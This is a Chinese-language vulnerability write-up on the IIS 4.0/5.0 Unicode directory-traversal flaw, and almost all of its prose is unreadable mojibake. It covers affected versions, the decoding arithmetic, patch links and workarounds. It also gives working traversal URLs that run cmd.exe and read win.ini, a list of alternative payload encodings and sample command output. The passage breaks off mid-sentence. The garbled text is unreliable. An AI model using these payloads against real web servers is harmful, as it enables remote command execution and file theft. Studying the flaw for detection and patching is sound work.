¡¡¡¡Ò»£®´æÔڵĩ¶´

¡¡¡¡1. ΢ÈíIIS 4.0 / 5.0 ´æÔÚÀ©Õ¹UNICODEĿ¼±éÀú©¶´£¬¸Ã©¶´¼ÈÊÇÒ»Ô¶³Ì©¶´£¬Í¬Ê±Ò²ÊÇÒ»±¾µØ©¶´¡£

¡¡¡¡ÊÜÓ°ÏìµÄ°æ±¾£º

¡¡¡¡Microsoft IIS 5.0

¡¡¡¡+ Microsoft Windows NT 2000

¡¡¡¡Microsoft IIS 4.0

¡¡¡¡+ Microsoft Windows NT 4.0

¡¡¡¡+ Microsoft BackOffice 4.5

¡¡¡¡- Microsoft Windows NT 4.0

¡¡¡¡+ Microsoft BackOffice 4.0

¡¡¡¡- Microsoft Windows NT 4.0

¡¡¡¡²»ÊÜÓ°ÏìµÄ°æ±¾£º

¡¡¡¡Â©¶´ÃèÊö£º

¡¡¡¡Î¢ÈíIIS 4.0ºÍ5.0¶¼´æÔÚÀûÓÃÀ©Õ¹UNICODE×Ö·ûÈ¡´ú"/"ºÍ"£Ü"¶øÄÜÀûÓÃ"../"

¡¡¡¡Ä¿Â¼±éÀúµÄ©¶´¡£

¡¡¡¡Î´¾­ÊÚȨµÄÓû§¿ÉÄÜÀûÓÃIUSR_machinenameÕ˺ŵÄÉÏÏÂÎÄ¿Õ¼ä·ÃÎÊÈκÎÒÑÖª

¡¡¡¡µÄÎļþ¡£¸ÃÕ˺ÅÔÚĬÈÏÇé¿öÏÂÊôÓÚEveryone ºÍUsers×éµÄ³ÉÔ±£¬Òò´ËÈκÎÓë

¡¡¡¡Web¸ùĿ¼ÔÚͬһÂß¼­Çý¶¯Æ÷ÉϵÄÄܱ»ÕâЩÓû§×é·ÃÎʵÄÎļþ¶¼Äܱ»É¾³ý£¬

¡¡¡¡Ð޸ĻòÖ´ÐУ¬¾ÍÈçͬһ¸öÓû§³É¹¦µÇ½ËùÄÜÍê³ÉµÄÒ»Ñù¡£

¡¡¡¡²âÊÔ·½·¨£º

¡¡¡¡http://target.computer/scripts/..%c1%1c../path/solo.txt

¡¡¡¡%c0%af = /

¡¡¡¡%c1%9c = ½â¾ö·½°¸:

¡¡¡¡¸Ã©¶´²¹¶¡Ëæ΢Èí°²È«¹«¸æMS00-057Ò»Æð·¢²¼

¡¡¡¡microsoft.com/technet/security/bulletin/ms00-057.asp

¡¡¡¡¿ÉÒÔ´ÓÈçϵØÖ·ÏÂÔز¹¶¡:

¡¡¡¡IIS 4.0

¡¡¡¡microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

¡¡¡¡IIS 5.0

¡¡¡¡microsoft.com/windows2000/downloads/critical/q269862/default.asp

¡¡¡¡2£®IIS 4.0/5.0 unicode½âÂ멶´µ¼ÖÂÎļþй©»òÖ´ÐÐ

¡¡¡¡IIS 4.0ºÍIIS 5.0ÔÚUnicode×Ö·û½âÂëµÄʵÏÖÖдæÔÚÒ»¸ö°²È«Â©¶´£¬µ¼ÖÂÓû§¿ÉÒÔÔ¶³Ìͨ¹ýIISÖ´ÐÐÈÎÒâÃüÁî¡£µ±IIS´ò¿ªÎļþʱ£¬Èç¹û¸ÃÎļþÃû°üº¬unicode×Ö·û£¬Ëü»á¶ÔÆä½øÐнâÂ룬Èç¹ûÓû§ÌṩһЩÌØÊâµÄ±àÂ룬½«µ¼ÖÂIIS´íÎóµÄ´ò¿ª»òÕßÖ´ÐÐijЩweb¸ùĿ¼ÒÔÍâµÄÎļþ¡£

¡¡¡¡¶ÔÓÚIIS 5.0/4.0ÖÐÎİ棬µ±IISÊÕµ½µÄURLÇëÇóµÄÎļþÃûÖаüº¬Ò»¸öÌØÊâµÄ±àÂëÀýÈç"%c1%hh"

¡¡¡¡»òÕß"%c0%hh",Ëü»áÊ×ÏȽ«Æä½âÂë±ä³É:0xc10xhh£¬ È»ºó³¢ÊÔ´ò¿ªÕâ¸öÎļþ£¬Windows ϵͳ

¡¡¡¡ÈÏΪ0xc10xhh¿ÉÄÜÊÇunicode±àÂ룬Òò´ËËü»áÊ×ÏȽ«Æä½âÂ룬Èç¹û 0x00<= %hh < 0x40µÄ»°£¬

¡¡¡¡²ÉÓÃµÄ ½âÂëµÄ¸ñʽÓëÏÂÃæµÄ¸ñʽÀàËÆ£º

¡¡¡¡%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh

¡¡¡¡%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh

¡¡¡¡[iduba_page]

¡¡¡¡Òò´Ë£¬ÀûÓÃÕâÖÖ±àÂ룬ÎÒÃÇ¿ÉÒÔ¹¹ÔìºÜ¶à×Ö·û£¬ÀýÈç:

¡¡¡¡%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ¡¯/¡¯

¡¡¡¡N %c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ¡¯¡¯

¡¡¡¡¹¥»÷Õß¿ÉÒÔÀûÓÃÕâ¸ö©¶´À´ÈƹýIISµÄ·¾¶¼ì²é£¬È¥Ö´ÐлòÕß´ò¿ªÈÎÒâµÄÎļþ¡£

¡¡¡¡(1) Èç¹ûϵͳ°üº¬Ä³¸ö¿ÉÖ´ÐÐĿ¼£¬¾Í¿ÉÄÜÖ´ÐÐÈÎÒâϵͳÃüÁî¡£ÏÂÃæµÄURL¿ÉÄÜ

¡¡¡¡Áгöµ±Ç°Ä¿Â¼µÄÄÚÈÝ£º

¡¡¡¡http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

¡¡¡¡(2) ÀûÓÃÕâ¸ö©¶´²é¿´ÏµÍ³ÎļþÄÚÈÝÒ²ÊÇ¿ÉÄܵģº

¡¡¡¡http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

¡¡¡¡Rain Forest Puppy <rfp@WIRETRIP.NET>²âÊÔ·¢ÏÖ¶ÔÓÚÓ¢ÎÄ°æµÄIIS 4.0/5.0,´ËÎÊÌâͬÑù

¡¡¡¡´æÔÚ£¬Ö»ÊDZàÂë¸ñʽÂÔÓв»Í¬£¬±ä³É"%c0%af"»òÕß"%c1%9c".

¡¡¡¡2. ÁÙʱ½â¾ö·½·¨£º

¡¡¡¡1¡¢Èç¹û²»ÐèÒª¿ÉÖ´ÐеÄCGI£¬¿ÉÒÔɾ³ý¿ÉÖ´ÐÐÐéÄâĿ¼,ÀýÈç /scriptsµÈµÈ¡£

¡¡¡¡2¡¢Èç¹ûȷʵÐèÒª¿ÉÖ´ÐеÄÐéÄâĿ¼£¬½¨Òé¿ÉÖ´ÐÐÐéÄâĿ¼µ¥¶ÀÔÚÒ»¸ö·ÖÇø

¡¡¡¡³§É̲¹¶¡£º

¡¡¡¡Î¢ÈíÒѾ­·¢²¼ÁËÒ»¸ö°²È«¹«¸æMS00-78£¬Äú¿ÉÒÔÔÚÏÂÁеØÖ·¿´µ½¸üÏêϸµÄÄÚÈÝ£º

¡¡¡¡http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp

¡¡¡¡²¹¶¡¿ÉÒÔ´ÓÏÂÁеØÖ·ÏÂÔØ£º

¡¡¡¡Microsoft IIS 4.0:

¡¡¡¡microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

¡¡¡¡Microsoft IIS 5.0:

¡¡¡¡microsoft.com/windows2000/downloads/critical/q269862/default.asp

¡¡¡¡¶þ£®UNICODE©¶´µÄÔ­Àí

¡¡¡¡ÉÏÊö©¶´Ò»´ÓÖÐÎÄIIS4.0+SP6¿ªÊ¼£¬»¹Ó°ÏìÖÐÎÄWIN2000+IIS5.0¡¢ÖÐÎÄWIN2000+IIS5.0+SP1£¬Ì¨Íå·±ÌåÖÐÎÄҲͬÑù´æÔÚÕâÑùµÄ©¶´¡£

¡¡¡¡ÖÐÎÄ°æµÄWIN2000ÖУ¬UNICODE±àÂë ´æÔÚBUG£¬ÔÚUNICODE ±àÂëÖÐ

¡¡¡¡%c1%1c -¡µ (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ¡¯/¡¯

¡¡¡¡%c0%2f -¡µ (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ¡¯£Ü¡¯

¡¡¡¡ÔÚNT4ÖÐ/±àÂëΪ%c1%9c

¡¡¡¡ÔÚÓ¢ÎÄ°æÀWIN2000Ó¢ÎÄ°æ%c0%af

¡¡¡¡µ«´Ó¹úÍâijЩվµãµÃÀ´µÄ×ÊÁÏÏÔʾ£¬»¹ÓÐÒÔϵıàÂë¿ÉÒÔʵÏֶԸ鶴µÄ¼ì²â£¬ %c1%pc

¡¡¡¡%c0%9v

¡¡¡¡%c0%qf

¡¡¡¡%c1%8s

¡¡¡¡%e0%80%af

¡¡¡¡%f0%80%80%af

¡¡¡¡%fc%80%80%80%80%af

¡¡¡¡[iduba_page]

¡¡¡¡Èý¡£UNICODE©¶´µÄ¼ì²â

¡¡¡¡ÒÔϾùÒÔÖÐÎÄ°æWIN2KΪÀý£¬Èç¹ûÊÇÆäËûNT°æ±¾£¬°´ÉÏÃæËùÊöµÄ±àÂëÌæ»»ÒÔÏ´úÂëÖеÄ%c1%1c×î¼òµ¥µÄ¼ì²â·½·¨£º

¡¡¡¡±ÈÈç˵ÓÐÒ»IPµØַΪX.X.X.XµÄWIN2KÖ÷»ú£¬ÎÒÃÇ¿ÉÒÔÔÚµØÖ·À¸ÊäÈëx.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dirÈç¹û´æÔÚ´Ë©¶´µÄ»°£¬ÎÒÃDZã¿ÉÒÔ¿´µ½ÒÔϵÄÄÚÈÝ£º£¨Àý×Ó¼ÙÉèSCRIPTSĿ¼ÀïÎÞÎļþ£©

¡¡¡¡Directory of C:£Üinetpub£Üscripts

¡¡¡¡2000-09-28 15:49 ¡´DIR¡µ .

¡¡¡¡2000-09-28 15:49 ¡´DIR¡µ ..

¡¡¡¡Êµ¼ÊÉÏÒ²¿ÉÒÔ¸ÄΪÕâÑù127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir¼´r=c Õâ¸ö×ÖĸµÄÈ¡´ú£¬¹ØÓÚrÕâ×Öĸ¿ÉÒÔµÈЧÓÚc,ÎÒÃÇ¿